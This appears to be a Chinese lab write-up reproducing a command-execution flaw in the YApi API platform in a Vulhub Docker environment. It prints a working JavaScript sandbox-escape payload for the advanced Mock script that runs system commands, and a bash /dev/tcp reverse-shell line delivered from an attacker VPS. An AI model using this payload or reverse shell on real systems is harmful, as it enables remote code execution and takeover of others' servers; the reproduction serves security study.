Yapi命令执行漏洞复现
一、漏洞描述
YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。
YAPI开放了注册功能,注册用户后新建项目并在接口的Mock功能里面添加了恶意脚本,最终执行了脚本里的命令
二、环境搭建
使用 Vulhub
搭建测试环境,项目地址 https://github.com/vulhub/vulhub
使用 docker
启动
docker-compose up -d
启动成功后访问 ip:3000
三、漏洞复现
首先注册一个账户,并登陆
新建项目
新建接口
高级 Mock
-> 脚本,填写恶意命令代码
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("id;uname -a;pwd").toString()
保存,点击预览,访问 Mock
地址
查看命令执行的结果
四、反弹shell
直接尝试 bash -i >& /dev/tcp/IP/port 0>&1
,发现报错无法正常反弹
尝试在 VPS
上使用 python
开启 http服务
新建 1.txt
文件内容为 bash -i >& /dev/tcp/IP/Port 0>&1
编辑网站 Mock
脚本
然后重新访问 Mock地址
成功反弹
Yapi命令执行漏洞复现相关推荐
- Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 kali docker
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 漏洞环境搭建 漏洞复现 反弹shell 题外话1 题外话2 影响版本:Apache Shiro <= 1.2.4 漏洞产生 ...
- CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议
CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议 本文仅为验证漏洞,在本地环境测试验证,无其它目的 漏洞编号: ...
- PHPMailer远程命令执行漏洞复现
PHPMailer远程命令执行漏洞复现 一.漏洞简介 PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, ...
- FastJson1.2.24反序列化导致任意命令执行漏洞复现(CVE-2017-18349)
#FastJson1.2.24反序列化导致任意命令执行漏洞(CVE-2017-18349)# 一.漏洞简介 Pippo是一款基于Java的Web框架.FastjsonEngine是其中的一个JSON处 ...
- 华为路由器远程命令执行漏洞复现(CVE-2017-17215)
华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值. CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞 ...
- 【vulhub】Apereo CAS 4.1 反序列化命令执行漏洞复现
楼主困了,这里就直接写上楼主自己的一些操作 详细过程可以看Apereo CAS 4.1 反序列化命令执行漏洞复现 特征: 1.网站根目录下有cas目录 2.如图所示,有apereo CAS图标 3.如 ...
- 开源堡垒机JumpServer远程命令执行漏洞复现
声明 好好学习,天天向上 漏洞描述 JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统.JumpServer 使用Python ...
- Dlink路由器 CNVD-2018-01084 远程命令执行漏洞 复现分析
Dlink路由器 CNVD-2018-01084复现分析 0x01 背景介绍 D-Link DIR 615/645/815路由器1.03及之前的固件版本存在远程命令执行漏洞.该漏洞是由于service ...
- 【Vulhub】Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)
脚本小子上线啦,开始复现以前出现实战环境的漏洞了,我会记录一些复现的漏洞(不会是全部),今天这个漏洞的原理我也不太会就知道是个Java反序列化的洞,只负责复现(脚本小子~). 漏洞介绍&环境搭 ...
最新文章
- ERROR 1366 (HY000): Incorrect string value: '\xD5\xC5\xC8\xFD' for column 'name' at row 1
- 何恺明、陈鑫磊新研究:提出实例分割新方法,效果比肩Mask R-CNN
- Python自学笔记-列表生成式(来自廖雪峰的官网Python3)
- 类与类之间 相同属性及字段拷贝
- 自适应网页设计/响应式Web设计 (Responsive Web Design)
- 【APIO2009-3】抢掠计划
- jQuery学习(一):鼠标移动显示大图
- mysql滴的一声就关了_关于mysql数据库在输入密码后,滴的一声直接退出界面的解决办法(详细办法)...
- 工作流的大致开发流程
- 从表象到本质,包你一文看懂NFT
- 民宿管理系统课程设计_民宿室内设计毕业设计
- 开发框架-移动开发平台: mPaaS
- Git版本控制管理——储藏和引用日志
- Quartus | FPGA开发工具(Inter系列芯片)
- 用指定的用户名和密码无法登陆到该ftp服务器
- BZOJ1123BLO Tarjan割点
- Android三大按钮,模拟Android导航栏三大金刚按键点击
- (软考中级--信息安全工程师)五、物理与环境安全技术
- 阿里云医疗实体关系抽取大赛
- 强在工业互联网的欧洲,为何没有牛逼的互联网公司?